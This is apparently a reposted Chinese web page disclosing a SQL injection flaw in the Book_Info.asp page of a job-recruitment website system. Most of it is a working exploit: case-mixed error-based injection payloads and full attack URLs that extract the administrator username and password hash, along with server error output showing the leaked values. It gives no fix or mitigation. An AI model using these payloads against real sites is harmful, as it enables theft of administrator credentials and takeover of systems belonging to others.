网站地图    收藏   

主页 > 后端 > 网站安全 >

网络求职招聘人才网站系统正式版注入 - 网站安

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 漏洞出现在Educate/Book_Info.asp此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出exp:如下查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)查询管理密码...

漏洞出现在Educate/Book_Info.asp
 
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
 
exp:如下
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
 
http://www.2cto.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
 
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
 
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
 
/Educate/Book_Info.asp,行 8
 
http://www.2cto.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
 
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
 
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
 
/Educate/Book_Info.asp,行 8

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论